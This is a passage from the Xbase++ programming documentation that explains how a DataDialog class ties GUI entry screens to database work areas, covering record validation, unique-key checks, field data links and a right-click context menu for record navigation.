The :writeData() method handles the problems of data validation and appending records as they occur in an event driven environment. This process is controlled by the mouse or rather by the user who causes the mouse clicks. Even though :writeData() is called from only one place in the :notify() method, it is impossible to foresee when this method will be called. While it is clear that it is called when the record pointer moves it is not possible to predict which record will be current when the method :writeData() is called. The special case occurs when the pointer is located on the phantom record. In this case data validation cannot be reversed using the :undo() method because no previously validated data exists. For this reason, all data must be validated before a new record can be appended. The method which checks that all data is valid is called :validateAll() and is shown below:
********************************************************************
* Validate data of all edit controls
* This is necessary prior to appending a new record to the database
********************************************************************
METHOD DataDialog:validateAll()
LOCAL i := 0, imax := Len( ::editControls )
LOCAL lValid := .T.
DO WHILE ++i <= imax .AND. lValid
lValid := ::editControls[i]:validate()
ENDDO
RETURN lValid
The method consists only of a DO WHILE loop that is terminated as soon as the XBP :validate method signals invalid data. The method :validate() is executed for all XBPs listed in :editControls. This method always returns the value .T. (true) unless there is a code block contained in the instance variable :validate. If a code block is contained in this instance variable, it is executed and receives the XBP as the first parameter. This code block performs data validation and returns .T. (true) if the data is valid.
Special data validation is needed for the primary key in a database. The primary key is the value in the database that uniquely identifies each record. There is always an index for the primary key. The method :isIndexUnique() (shown below) tests whether a value already exists as a primary key in an index file of the database. This method demonstrates an extremely important aspect for the use of DataDialog objects (more precisely: for the use of the function DbRegisterClient()):
********************************************************************
* Check whether an index value does *not* exist in an index
********************************************************************
METHOD DataDialog:isIndexUnique( nOrder, xIndexValue )
LOCAL nOldOrder := OrdNumber()
LOCAL nRecno := Recno()
LOCAL lUnique := .F.
DbDeRegisterClient( self ) // Suppress notification from DBO
// to self during DbSeek() !!!
OrdSetFocus( nOrder )
lUnique := .NOT. DbSeek( xIndexValue )
OrdSetFocus( nOldOrder )
DbGoTo( nRecno )
DbRegisterClient( self )
RETURN lUnique
The functionality of the :isIndexUnique() method is very limited. All it does is search for a value in the specified index and return the value .T. (true) if the value is not found. An important point shown here is that the DataDialog object executing the method must be deregistered in the work area. It was initially registered in the work area by the method :create(), causing the method :notify() to be called every time the record pointer changes. In this case, it is a method of the DataDialog object changing the pointer by calling DbSeek(). If the DataDialog object were not deregistered, an implicit recursion would result since each change to the pointer via DbSeek() calls the method :notify(). For this reason, DbDeRegisterClient() is used to deregister the DataDialog object prior to the call to DbSeek(). It is again registered in the work area using DbRegisterClient() after DBSeek().
In summary, the DataDialog class solves many problems which must be considered when programming GUI applications that work with databases. Record pointer movements are easily identified in the method :notify() that is automatically called when the DataDialog object is registered in the current work area using the function DbRegisterClient(). Before the record pointer is moved, a DataDialog object copies the changed data in :editControls back into the database. After the record pointer is changed, a DataDialog object displays the current data. Data validation occurs prior to data being written into the database either by a new record being appended or existing data being overwritten. Whether new data is being saved or existing data modified is determined by the DataDialog object.
Objects of the DataDialog class described in the previous section are appropriate for programming data entry screens in GUI applications. Each input screen is an independent window that is displayed as a child of the application window. In each child window (input screen) Xbase Parts are added to edit the database fields. Because they are separate windows, it is recommended that each entry screen be programmed in a separate routine. The tasks of this routine include opening all databases required for the entry screen, creating the child window (DataDialog), and adding the Xbase Parts needed for editing the database fields to the entry screen. In the example application MDIDEMO, two entry screens are programmed, one for customer data and one for parts data. The process of creating the data entry screen is the same in both cases. Sections of the program code from the file MDICUST.PRG are discussed below to illustrate various aspects significant when programming data entry screens:
********************************************************************
* Customer Dialog
********************************************************************
PROCEDURE Customer( nRecno )
LOCAL oXbp, oStatic, drawingArea, oDlg
FIELD CUSTNO, MR_MRS, LASTNAME, FIRSTNAME, STREET, CITY, ZIP , ;
PHONE , FAX , NOTES , BLOCKED , TOTALSALES
IF ! OpenCustomer( nRecno ) // open customer database
RETURN
ENDIF
oDlg := DataDialog():new( RootWindow():drawingArea ,, ;
{100,100}, {605,315},, .F. )
oDlg:title := "Customer No: "+ LTrim( CUSTNO )
oDlg:icon := ICON_CUSTOMER
oDlg:create()
/* ... */
The Customer() procedure creates a new child window in the MDI application where customer data can be edited. LOCAL variables are first declared to reference the Xbase Parts created and all of the database fields are identified to the compiler as field variables. Before the child window (DataDialog) is created, the required database(s) must be open. This occurs in the function OpenCustomer() which returns the value .F. (false) only if the customer database could not be opened. Opening the database might fail because another workstation has the file exclusively open or the file is simply not found.
When the required file(s) can be opened, the dialog window is created. This is done using DataDialog class method :new() which generates a new instance of the DataDialog class. The parent of the new object is the drawing area ( :drawingArea) of the application window created in AppSys() and returned by the user-defined function RootWindow(). As soon as the child window is created, the Resource ID for an icon must be entered into the instance variable :icon. This icon is displayed within the application window when the child window is minimized. In this example, the #define constant ICON_CUSTOMER is used. An icon is declared in a resource file and must be linked to the executable file using the resource compiler. If no icon ID is specified for a child window, the window contents in the range from point {0,0} to point {32,32} are used as the icon when the window is minimized. This means everything visible in the lower left corner of the child window up to the point {32,32} appears as the symbol for the minimized child window.
In the example program MDICUST.PRG, only the CUSTOMER.DBF database file needs to be opened. It is important for the customer database to be reopened each time the procedure Customer() is called. This is shown in the program code of the function OpenCustomer():
********************************************************************
* Open customer database
********************************************************************
FUNCTION OpenCustomer( nRecno )
LOCAL nOldArea := Select(), lDone := .F.
USE Customer NEW
IF ! NetErr()
SET INDEX TO CustA, CustB
IF nRecno <> NIL
DbGoto( nRecno )
ENDIF
lDone := .T.
ELSE
DbSelectArea( nOldArea )
MsgBox( "Database cannot be opened" )
ENDIF
RETURN lDone
Each instance of the DataDialog class (each data entry screen) manages its own work area. If the Customer() procedure is executed 10 times, 10 data entry screens are created for customer data and the CUSTOMER.DBF file is opened 10 times. This rule is standard for event oriented GUI applications: Each dialog opens its own database. This requires some consideration for programmers coming from DOS procedural programming, since the same approach is not appropriate under DOS because of the 255 file handle limit. This limit does not exist under a 32bit operating system. Access to a single database file from several dialogs does require that protection mechanisms be implemented in the Xbase++ application. The mechanisms for locking records or files is sufficient under Xbase++ so that when the program allows simultaneous access on a network, it will also handle the file being opened multiple times within a single application.
Each call to OpenCustomer() opens the customer database in a new work area and the method DataDialog:create() registers the dialog window in this new work area. From this point on, the DataDialog object is notified about each change in the work area (via the method :notify()) and can be assigned the appropriate XBPs (via :editControls) so that they can automatically be handled by the DataDialog methods. (Note for Clipper programmers: the expression USE Customer NEW is allowed in Xbase++ without specifying an alias name. If a database is opened multiple times, Xbase++ provides a unique alias name formed from the file name and the number of the current work area).
When the database is open and the DataDialog (the child window) is created, the most important processes for programming a data entry screen are nearly complete. Xbase Parts must still be added to the dialog window. These include both XBPs that contribute to the visual organization of the data entry screen (borders and text) and XBPs that allow access to database fields via :dataLink. This second group is primarily made up of objects from the classes XbpSLE, XbpCheckBox and XbpMLE. XbpSLE objects provide single line data entry fields, XbpCheckBox objects manage logical values and XbpMLE objects provide multiple line data entry fields that allow memo fields to be edited. Objects of the classes XbpSLE, XbpCheckBox and XbpMLE are sufficient to program the sections of data entry screens where database fields are edited.
Boxes that are displayed by XbpStatic objects are used to provide visually organization of data entry screens. Entry fields are not only visual separated when they appear in a box, but the fields can also be grouped in the program logic. The following program section shows another example of code defining a part of a data entry screen. This example is a continuation of the Customer() procedure:
// Get drawing area from dialog
drawingArea := oDlg:drawingArea
oStatic := XbpStatic():new( drawingArea ,, {12,227}, {579,58} )
oStatic:type := XBPSTATIC_TYPE_GROUPBOX
oStatic:create()
In the above sample, the drawing area (:drawingArea) of the dialog window is retrieved and passed as the parent for the dialog elements to be displayed in the window. The first dialog element is an XbpStatic object responsible for displaying a group box. This box displays text (the caption) in the upper left corner. A group box is used for grouping data entry fields and acts as the parent for all the Xbase Parts which are displayed within the group box. In other words: the parent for a group box is the :drawingArea and the parent for the Xbase-Parts displayed within the group box is the XbpStatic object representing the box. For this reason the XbpStatic object is referenced in the variable oStatic and is used as the parent in the example of creating data entry fields shown below:
oXbp := XbpSLE():new( oStatic,, {95,135}, {180,22} )
oXbp:bufferLength := 20
oXbp:dataLink := {|x| IIf( x==NIL, Trim(LASTNAME), LASTNAME := x ) }
oXbp:create():setData()
oDlg:addEditControl( oXbp ) // register Xbp as EditControl
In the above sample, a data entry field is created for display within a group box (the parent of the data entry field is oStatic). The XbpSLE object accesses the database field NAME and the length of the edit buffer is limited to the length of the database field. The field LASTNAME has 20 characters in the example. A general incompatibility between database fields and XbpSLE objects is handled in the :dataLink code block. When data is read from the database field, the padding blank spaces are included. If the data is copied directly from the field LASTNAME into the edit buffer of the XbpSLE object, 20 characters are always included in the edit buffer even for a name such as "Smith" that is only five characters long. The blank spaces stored in the database field are copied into the edit buffer of the XbpSLE object. The result is that the edit buffer of the XBP object is already full and characters can only be added to the edit buffer in "Overwrite" mode. An XbpSLE object considers blank spaces as fully valid characters and to prevent these problems, the blank spaces at the end of the name (trailing spaces) are explicitly removed using Trim() when the data is read from the database field LASTNAME within :dataLink.
An XbpSLE object can only edit values in its edit buffer that are of "character" type. The maximum number of characters is 32KB. Values of numeric or date type must be converted to a character string when copied into the edit buffer of an XbpSLE object and converted back to the correct type before being written into the database field. This must be done in the data code block contained in :dataLink. Examples for code blocks which perform type conversions are shown below:
oXbp:dataLink := {|x| IIf(x==NIL, Transform( FIELD->NUMERIC, "@N"), ;
FIELD->NUMERIC := Val(x) ) }
oXbp:dataLink := {|x| IIf(x==NIL, DtoC( FIELD->DATE ), ;
FIELD->DATE := CtoD(x) ) }
When database fields are read into the edit buffer of an XbpSLE object blank spaces must be deleted and numeric and date values must be converted to character strings. When the modified data is saved to the database fields, values for date and numeric fields must again be converted to the correct data type. This task is performed by the data code block assigned to the instance variable :dataLink.
Another task of the data code block contained in :dataLink occurs when more than one file is required for the data entry screen (the DataDialog). In this case, fields from several databases are edited in a single data entry screen and the data code block must also select the correct work area for the field variable.
The previous discussions of GUI application concepts have focused on the basic organization of a GUI program. The key issues discussed were the program start, program execution, and program end. These correspond to AppSys() with a menu system, the Main procedure with the event loop and AppQuit(), respectively. The DataDialog class was discussed as a mechanism for linking dialog windows with DatabaseEngines. This class offers solutions to problems that can occur during simultaneous access on a network or when a database is opened multiple times in a single application. In the previous section, incorporating Xbase Parts into a dialog window was illustrated. The final remaining question for programming GUI applications is: How is the program controlled within an individual dialog window?
A distinction must be made between controlling a window and controlling an application. The overall running of the application is controlled by the application menu installed in the application window. In an SDI application, control of the application is basically the same as control of the dialog window, since the application consists of only a single dialog window. In the SDIDEMO example application, control of the application through the menu system includes selecting the data entry screens for customer data or for parts data. Control within windows occurs using pushbuttons that allow record pointer movement within the customer file or parts file, cause the current data to be saved or terminate the data input.
In the example application MDIDEMO, the application control is limited to opening the customer or parts data entry screen. A child window presents data for a customer or a part. As soon as a child window is opened, the application and the application menu no longer have control over the newly opened window. Program control within a child window is performed in an MDI application by a context menu that is an essential control element for program control. A context menu is generally activated by clicking the right mouse button. It is displayed on the screen as a Popup menu. Its menu items provide a selection of actions that are appropriate to execute within the window or in relation to the dialog element where the right mouse click occurred.
The context menu in the MDIDEMO example application includes program control of database navigation (DbSkip(), DbGoBottom(), DbGoTop()) and elementary database operations such as "Search", "Delete" and "New record". Programming a context menu requires the definition of an XbpMenu object and is otherwise similar to programming application menu objects. As an example, the program code to create the context menu for the customer database used in MDIDEMO is shown below:
********************************************************************
* Create context menu for customer dialog
********************************************************************
STATIC FUNCTION ContextMenu()
STATIC soMenu
IF soMenu == NIL
soMenu := DataDialogMenu():new()
soMenu:title := "Customer context menu"
soMenu:create()
soMenu:addItem( { "~New", ;
{|mp1,mp2,obj| DbGoTo( LastRec()+1 ) } ;
} )
soMenu:addItem( { "~Seek" , ;
{|mp1,mp2,obj| SeekCustomer( obj:cargo ) } ;
} )
soMenu:addItem( { "~Delete" , ;
{|mp1,mp2,obj| DeleteCustomer( obj:cargo ) } ;
} )
soMenu:addItem( { "S~ave" , ;
{|mp1,mp2,obj| obj:cargo:writeData() } ;
} )
soMenu:addItem( MENUITEM_SEPARATOR )
soMenu:addItem( { "~First" , ;
{|mp1,mp2,obj| DbGoTop() } ;
} )
soMenu:addItem( { "~Last" , ;
{|mp1,mp2,obj| DbGoBottom() } ;
} )
soMenu:addItem( MENUITEM_SEPARATOR )
soMenu:addItem( { "~Previous" , ;
{|mp1,mp2,obj| DbSkip(-1) } ;
} )
soMenu:addItem( { "~Next" , ;
{|mp1,mp2,obj| DbSkip(1) } ;
} )
// menu items are disabled after Bof() or GoTop()
soMenu:disableTop := { 6, 9 }
// menu items are disabled after GoBottom()
soMenu:disableBottom := { 7, 10 }
// menu items are disabled at Eof()
soMenu:disableEof := { 1, 2, 3 }
ENDIF
RETURN soMenu
A code block is defined for each menu item in the context menu. This code block is executed when the user selects the menu item. Many of the code blocks control database navigation using functions such as DbSkip(), DbGoTop(), and DbGoBottom(). The DataDialog object is automatically notified of these operations (its :notify() method is called) since it is registered in the work area. The context menu itself can only be activated on the DataDialog object (child window) which currently has focus. The menu is activated with a right mouse click that must occur within the DataDialog window. The DataDialog window activates its context menu through the following callback code block (see MDICUST.PRG file, function Customer()):
drawingArea:RbDown := {|mp1,mp2,obj| ;
ContextMenu():cargo := obj:setParent(), ;
ContextMenu():popup( obj, mp1 ) }
The :drawingArea is the drawing area of the DataDialog window. The ContextMenu() function is shown above. This function returns the contents of the STATIC variable soMenu, which is the context menu. The code block parameter obj contains a reference to the Xbase Part that is processing the event xbeM_RbDown (right mouse button is pressed). In this case, this is the drawing area of the DataDialog ( :drawingArea) and the expression obj:setParent() returns the DataDialog object that is assigned to the :cargo instance variable of the context menu. This all occurs before the context menu is displayed using the method :popUp(). The current mouse coordinates (relative to obj) are contained in mp1. This allows the return value of ContextMenu() (the context menu) to be displayed at the position of the mouse pointer.
When a menu item is selected in the context menu, the DataDialog object where the context menu is activated is always contained in the :cargo instance variable. This DataDialog object has the focus (otherwise it would not react to a right mouse button click). The DataDialog object with the focus was previously selected via the callback code block :setDisplayFocus which sets the appropriate work area as the current work area. Database navigation can occur in the context menu by simply calling DbSkip() or DbGobottom() without the work area where the movement is to occur being specified. The work area is selected by the DataDialog object when it receives the focus. The context menu can only be activated on a DataDialog object that has the focus because only the DataDialog object with focus reacts to the event xbeM_RbDown and the context menu is only activated in the callback code block :RbDown.
This discussion outlines program control via a context menu as it is used in the example application MDIDEMO (it may be easier to follow by stepping through the code in the debugger). In conclusion, a context menu can be an important control element in a GUI application. Generally a context menu is not specific to a work area but calls functionality that must operate regardless of the work area. In short: a context menu controls an Xbase Part.
|
https://doc.alaska-software.com/content/xppguide_h2_creating_gui_applications.html
|
CC-MAIN-2022-05
|
refinedweb
| 10,958
| 50.57
|
Using DirectX
With Borland C++
Written by Michael
Lundberg
Well , I must admit that I went to hell and back before I get all this to
work , but I started with DirectX 3 SDK and they didn't even include Borland
compatible libraries so I have to use the IMPLIB program to import them in
Borland format.
The first thing you need is all the libraries and all include files from the
DirectX software development kit (The VERY first thing you need is to have
DirectX installed , of course).
I use DirectX5 SDK for the moment and there is a separate folder
with Borland compatible libraries provided in the package . One library ,
DXGuid.lib , was faulty in my package so I have to download a fixed one from
internet .( Unfortunately I forgotten where.) It seem to be a mistake by
Microsoft , as usual , and I don't know if all DirectX 5 SDK packages has a
faulty DXGuid library .
I have copied all libraries to my BC5 \ libraries folder and all includes to
my BC5 \ includes folder to get some order on my already cluttered hard drive.
The next thing to do is to start up Borland and make a new project , as
usual. I usually configure my project like this :
Target type : application ( . exe )
Platform : win 32
Target model : GUI
The only other thing that should be checked is "dynamic" .
Uncheck MFC , OWL and Class libraries.
The first thing to do in the actual program is to include all DirectX include
files that you are using. If you use DirectDraw include ddraw.h, if you use
Direct3D include d3drm.h and so on. A typical beginning of my programs
looks like this :
#define INITGUID
#define WIN32
#include <stdlib.h>
#include <ddraw.h>
#include <d3drm.h>
#include <math.h>
#include <dinput.h>
#include <ddutil.h>
#include <dsound.h>
#include <dsutil.h>
.
.
.
All the libraries that you are using must also be added to your project by
right clicking in the project window and choose Add Node in the pop up menu.
Then browse your way to the libraries folder , in my example BC5 \ libraries and
click on the library you want to add, ddraw.lib, d3drm.lib, dsound.lib or
whatever. If you don't intend to use any 3D there's no need to add any of
the 3D libraries of course.
One special thing is when you want to use DirectInput. After including
dinput.h and added dinput.lib you must also add DXGuid.lib to your project.
It has something to do with GUIDs or something .:-| And that should do it
.Now its time to hack something beautiful and run the whole thing .
It is much harder to compile the examples that comes with the package.
Many examples uses functions in many external programs. All DirectDraw
examples , for example :-) , uses functions in the ddutil.cpp file stored
elsewhere in the package. To run those examples create a project like
above. You also need to check if there is a resource file in the sample
folder , in that case choose Advanced in the Project menu and check the .rc
button. After that you must include the ddutil.h file at the beginning of
your code and add ddutil.cpp using Add Node , as explained above. To run
the samples that uses sound you must also add dsutil.h to your code and
dsutil.cpp to your project. PUH!
It becomes even more difficult if you want to run the 3D samples
because they use even more external programs . One tip is to check the top of
the sample program to see which files that are included .If you don't add all
those programs and libraries correct the famous UES (Unresolved External
Syndrome ) happens , and thats not funny.
If you want to use Direct3D the following line must be added to your program,
to override the floating point exception handler:
int _matherr(struct _exception *e){e; return 1;}
In addition, you will need to add the following line to your initialization
routine prior to starting Direct3D:
_control87(MCW_EM,MCW_EM);
It has something to do with Borland error routines , don't ask why , just put
it in somewhere ( I'm happy as long as things works and I never ask why they
work)./15/01.
|
http://www.mvps.org/directx/articles/directx_in_borland_c++.htm
|
crawl-002
|
refinedweb
| 716
| 75.1
|
Created on 2009-08-19 13:17 by surprising42, last changed 2011-06-20 03:03 by r.david.murray. This issue is now closed.
using imaplib IMAP4_SSL, would fail at login due to TypeError, implicit
conversion from bytes object to string around line 1068 involving
function "_quote".
My fix:
def _quote(self, arg):
#Could not implicitly convert to bytes object to string
arg = arg.encode('utf-8') #added this line to solve problem
arg = arg.replace(b'\\', b'\\\\')
arg = arg.replace(b'"', b'\\"')
return b'"' + arg + b'"'
See issue 1210 for background on the imaplib bytes/string issues.
A quick glance at the imaplib code leaves me confused. _checkquote,
for example, appears to be mixing string comparisons and byte
comparisons. Issue 1210 says imaplib _command should only quote
strings, but it does not appear at a quick glance to do any
quoting (the call to _checkquote is commented out).
It looks like the fix that would be consonant with the rest of
the code would be to convert the password to bytes using
the ASCII codec in the login method before calling _quote.
I'm adding Victor as nosy since he did the 1210 patch.
IMAP4 protocol uses bytes, not characters. There is no "standard
charset", so you have to encode (manually) your login and password as
bytes. login method prototype:
IMAP4.login(login: bytes, password: bytes)
You server may use UTF-8, but another server may use ISO-8859-1 or any
other charset.
The documentation should explain why the Python library uses bytes and
not "simply" characters.
I checked the latest documentation for 3.1.1
(), but I can't find any
reference to needing to encode information myself for the login
procedure. Is there some other documentation you are referring to?
In any case, the error wasn't returned by the server, but by imaplib. If
the arg needs to be encoded for the whole process, then the arg should
be checked for the appropriate type (I think the doc even says "plain
text password"), or an optional encoding argument for the relevant
functions (or a catchall used when connecting to the server?) with a
default encoding attempted.
> I can't find any reference to needing to encode information
> myself for the login procedure. Is there some other
> documentation you are referring to?
Exactly, the Python imaplib documentation should be fixed (the doc, not
the code).. Can't we convert str parameters to login() to
ascii too? It already done in other methods (the _command() method
iterates over args and converts them).
>.
Ok, that sounds like a good compromise. Can you write a patch?
Ok, it think it's good to leave internal _quote() function operating on
bytes and convert password argument in login(). The method now works
with both str and bytes as arguments.
This was fixed in issue 4471 by Antoine when he added some tests that call login. He fixed it by changing _quote to work with strings. Per the discussion here I'm not sure this is the best fix, but until someone reports a bug with it it we may as well let it stand.
|
http://bugs.python.org/issue6734
|
CC-MAIN-2013-20
|
refinedweb
| 524
| 74.08
|
1
Ok here is a program I am working on for an assignment.
import java.io.*; public class Copy { public static void main(String[] args) throws IOException { File inputFile = new File("p1.txt"); File outputFile = new File("p2.txt"); FileReader in = new FileReader(inputFile); FileWriter out = new FileWriter(outputFile); int c; while ((c = in.read()) != -1) out.write(c); in.close(); out.close(); } }
Now it works fine and everything, the problem is that I want it to print the outputFile to the screen when I run the application. And I can't figure out how! Our teacher would only say that it has something to do with a buffered reader, and I have never been very talented at those. :cry: If anyone could help with this I would really appreciate it.
|
https://www.daniweb.com/programming/software-development/threads/1067/how-do-you-output-to-the-screen
|
CC-MAIN-2016-40
|
refinedweb
| 131
| 73.58
|
Only thing different is I have to have a class that stores all of the information, then a demo program to get the users input and run everything. Not just all in one.
This is what I got so far, but obviously I make things much more complicated then what they need to be. This is the sound class that will be accesed by the soundDemo program. I wrote this one from scratch. I have to have mutator and accessor methods.
public class sound { private final double air = 1100; private final double water = 4900; private final double steel = 16400; double distance; double time; // no arg constructor public sound() { distance = 0.0; } //parameterized constructor public sound(double d) { distance = d; } //mutator methods public void setDistance(double d) { distance = d; } //accessor methods public double getSpeedInAir() { return distance / 1100; } public double getSpeedInWater() { return distance / 4900; } public double getSpeedInSteel() { return distance / 16400; } }
This is my demo program. I have repeating information because I am not sure what needs to be where. I used the else if portion from the solution in the thread above.
import java.util.Scanner import java.util.DecimalFormat public class soundDemo { public static void main(String[] args) { double choice System.out.print("Please choose 1. Air 2. Water 3. Steel 4. Quit "); choice = keyboard.nextDouble(); if (input.equals("1")) { time = (distance / 1100); System.out.println("The total time traveled is " + time + "."); } else if (input.equals("2")) { time = (distance / 4900); System.out.println("The total time traveled is " + time + "."); } else if (input.equals("3")) { time = (distance / 16400); System.out.println("The total time traveled is " + time + "."); } else { System.out.println("Invalid input!"); } System.out.print("What distance would you like to know? "); distance = keyboard.nextDouble();
I just need nudged in the right direction, because I'm pretty sure I have all the information already coded. It's just in the wrong place. Any tips would be greatly appreciated!
|
http://www.dreamincode.net/forums/topic/226406-splitting-a-program-into-a-seperate-class/page__p__1303895
|
CC-MAIN-2016-07
|
refinedweb
| 317
| 52.46
|
- Some Thoughts on XSL
- Not Only for Publishing...
- ... but Also for Data
- Where to Now?
- About Pineapplesoft Link
XML Expert Benoît Marchal gives a crash course in XSL, including its uses for web publishing and data management, as well as where XSL is headed in the future.
XSL is the XML Stylesheet Language, one of the numerous standards published by the W3C to support XML. I consider XSL one of major XML standards, along with namespaces and SAX. I rate XSL as major because almost every XML application will need it.
I did a fair amount of XSL work last month: the new XML book, which I am currently writing, explores several advanced XSL techniques. I also gave a customized XSL training for a local company. Finally, I still receive many comments following the "XML Programming for Teams" article I published in last September.
Last but not least, there are almost daily XSL-related announcements: new XSL processors, new formatters and, at long last, XSLFO is close to being final. One of the funniest XSL announcements came from Don Box who wrote a SOAP endpoint in XSL!
Crash Course on XSL
The naming "stylesheet" is very unfortunate. In most cases, a style sheet is a tool to format and publish documents, e.g. Cascading Style Sheet or Word style sheets (now called templates). Not quite with XSL or, to be more correct, XSL is 10% formatting and 90% non-formatting!
There are two main aspects in XSL. Firstly XSLT and XPath define a transformation language (the T in XSLT stands for transformation). In other words, it's a tool to take an XML document and transform it in another XML document (although HTML and text are also supported).
Secondly XSLFO (XSL Formatting Objects) is a language to describe mainly printed documents. This part of XSL is what you would expect in a style sheet, it's all about choosing font, boldness and page jumps. However, unlike XSLT and XPath, it's not a standard yet (but soon will be).
|
http://www.informit.com/articles/article.aspx?p=19628
|
CC-MAIN-2016-50
|
refinedweb
| 339
| 72.26
|
Download presentation
Presentation is loading. Please wait.
Published byJazmin Louden Modified over 2 years ago
1
Valuing bond Fundamentals of corporate finance, BMM Chapter 6 Valuing bond Finansiell ekonomi höst 2012
2
Topics Covered Using The Present Value Formula to Value Bonds How Bond Prices Vary With Interest Rates The Term Structure of Interest Rates Real and Nominal Rates of Interest Corporate Bonds and the Risk of Default 2
3
Board of Directors Chairman of the Board and members are accountable for the organization Management Chief Executive Officer (CEO) and his team run the company The Corporation (internal) The Marketplace (external) Equity Markets Analysts and other market agents evaluate the performance of the firm on a daily basis Debt Markets Ratings agencies and other analysts review the ability of the firm to service debt Auditors External opinion as to the fairness of presentation and conformity to stds of financial statements Regulators SEC, the OMX, or other regulatory bodies by country Legal Counsel Provides legal opinions and recommendations on legality of corporate activities Entities with capital at risk in the corporation, but can also reap gains or returns from activities with the corporation Entities whose services are purchased by the corporation The Structure of Corporate Governance 3
4
Why companies issue bonds? To finance their investment project. Issuing bond does not have the loss of ownership as issuing stocks do, since bond is a debt certificate. Bondholders have a role in monitoring the firm´s activities due to the periodic payment feature of the bond. Bonds provide a fixed rate of return for investors! The required rate of return on bond is lower than the stocks. Since stocks are inherently riskier. 4
5
Definitions A bond is a debt security. It is a formal contract promising to repay borrowed money with interest at fixed intervals. (Obligation) Maturity date — the date on which the issuer has to repay the nominal amount. (löptid) Yield to maturity is internal rate of return (IRR, overall interest rate) earned by an investor who buys the bond today at the market price. 5
6
Zero Coupon Bond (nollkupongare) A zero coupon bond pay no regular interest. It is issued at a substantial discount to par value (face value). Sensitive to interest rate changes.par value t.ex. SSVX Statsskuldsväxlar är nollkupongare. Current yield: annual coupon payments divided by bond price. 6
7
Kopior av aktiebrev och obligation från Bofors- Gullspång Aktiebolag 7
8
Premium bond issued by British National savings association 8
9
Government bond issued by the State of South Carolina 2011 9
10
(SOX) Obligationer Sverige 10
11
Exempel: statsobligation 11
12
Räkna ut ränta (Yield to maturity) RGKB 1047, säljränta 128,48%, kupong 5kr, slutvärde 100, löptid 8 år + 96/360=8,267 år. Yielden blir 1,338 %. 12
13
Exempel (yield to maturity) RGKB 1046, löptid 44 dagar/360 år. Kupong 5,5 säljränta 100,486, slutvärde 100, Yielden blir 1,49%. Du märkte att yielden är lite högre än 8 års yield. 13
14
The pricing of bonds Any bond can be valued as an annuity plus a single payment. It is the present value of the interest payments and the principal payment (face value) discounted at the yield to maturity of the bond. Bond dealers earn a spread by selling higher than its bid price. Bid price –ask price= spread 14
15
Zero coupon bond (discount bond) Consider a 30-year zero-coupon bond with a face value of $100. If the bond is priced at an annual YTM of 10%, what is the price of the bond today?zero-coupon bond Price = PV (cash flow)=100/(1,1) 30 = 5,73 $ the discount amount is your interest payment. 5,73 $ is the price you pay for the bond. At the maturity date, you will be paid 100 $ face value, the effective annualized return or Yield to Maturity is 10%. 15
16
Valuing a Coupon Bond 16
17
Valuing a Bond Example%) Cash Flows Sept 1112131415 1151151151151115 17
18
Valuing a Bond Example continued%) 18
19
Valuing a Bond Example - France In December 2008 you purchase 100 Euros of bonds in France which pay a 8.5% coupon every year. If the bond matures in 2012 and the YTM is 3.0%, what is the value of the bond? 19
20
Kalkyler i excel Example - France In December 2008 you purchase 100 Euros of bonds in France which pay a 8.5% coupon every year. If the bond matures in 2012 and the YTM is 3.0%, what is the value of the bond? (obs! På engelska version använder vi NPV I stäälet för Netnuvärde) 20
21
Valuing a Bond Another Example - Japan In July 2010 you purchase 200 Yen of bonds in Japan which pay a 8% coupon every year. If the bond matures in 2015 and the YTM is 4.5%, what is the value of the bond? Note the value is 230.73. corrected! 21
22
Valuing a Bond Example - USA In February 2009 you purchase a 3 year US Government bond. The bond has an annual coupon rate of 4.875%, paid semi-annually. If investors demand a 0.006003% semiannual return, what is the price of the bond? Present value of c/2 coupon payment over 2 t period. Apply Annuity formula. Halva kupong och dubbel löptid! Samt relevant yielden! 22
23
Valuing a Bond Example continued - USA Take the same 3 year US Government bond. If investors demand a 4.0% semiannual return, what is the new price of the bond? 23
24
Interest Rate on 10yr Treasuries Year Yield, % 24
25
Bond Prices and Yields (inverse relationship) Interest Rates, % Bond Price 25
26
Time to Maturity and Prices: increase interest rate, the price of longer term bonds decrease more, all else konstant! Interest Rates, % Bond Price, ($) 30 yr bond 3 yr bond When the interest rate equals the 5% coupon, both bonds sell for face value 26
27
Source: Bloomberg.com Figure 1: Yield Curve January 2008: changing term structure 27
28
The recent term structure of interest Rate: upward sloping YieldCurve.comYield Curve figures updated weekly since October 2003 To select historical yield curve data use drop-down menu UK Gilt US Treasury 6 Month 3 Month 1 Year 6 Month2 Year5 Year10 Year30 Year August 22, 20110.580.530.611.262.413.78 0.010.020.200.932.123.42 August 15, 20110.620.570.651.302.533.95 0.010.070.190.962.253.73 August 8, 20110.580.470.551.422.693.87 0.010.040.291.252.563.85 August 1, 20110.600.490.631.582.864.02 0.090.150.361.362.80 4.12 28
29
UK gilt and US treasury yield vs. Time to maturity (2011 aug 22.) 29
30
Interest Rates Short- and long-term interest rates do not always move in parallel. Between September 1992 and April 2000 U.S. short-term rates rose sharply while long term rates declined. A indication of recession in 2000. 30
31
Term Structure of Interest Rates The relationship between short term and long term interest rate is called the term structure of interest rate. Spot Rate - The actual interest rate today (t=0) Forward Rate - The interest rate, fixed today, on a loan made in the future at a fixed time. Future Rate - The spot rate that is expected in the future YTM (r) Year 1981 1987 & Normal 1976 1 5 10 20 30 31
32
Maturity U.S. Treasury Strip Spot Rates as of February 2009: the yield curve Spot rates (%) 32 The yield curve depicts the term structure of interest rate.
33
Yield to Maturity Example A $1000 treasury bond expires in 5 years. It pays a coupon rate of 10.5%. If the market price of this bond is 1078.8, what is the YTM? C0C1C2C3C4C5 -1078.801051051051051105 Calculate IRR = 8.5% Obs: använd Ränta= som argument I excel program svenska version. 33
35
Inflation Rates Annual rates of inflation in the United States from 1900–2008. Annual Inflation (%) 35
36
Global Inflation Rates Averages from 1900-2006 36
37
Debt & Interest Rates Nominal r = Real r + expected inflation (approximation) Actual formula
38
UK Bond Yields 10 year nominal interest rate 10 year real interest rate Interest rate (%) 38
39
Govt. Bills vs. Inflation (’53-’08) % United Kingdom Inflation T-Bill Returns 39
40
Govt. Bills vs. Inflation (’53-’08) % United States Inflation T-Bill Returns 40
41
Govt. Bills vs. Inflation (’53-’08) % Germany Inflation T-Bill Returns 41
42
Bond Ratings Key to bond ratings. The highest-quality bonds are rated triple A. Bonds rated triple B or above are investment grade. Lower-rated bonds are called high-yield, or junk, bonds. 42 Check the course book BMM for more details.
43
Yield Spread: credit risk Yield spread between corporate and government bonds, % Yield spreads between corporate and 10-year Treasury bonds. Obs: the spread indicates the credit risk of Baa related corporate bond over riskfree treasury bond! Years 43
44
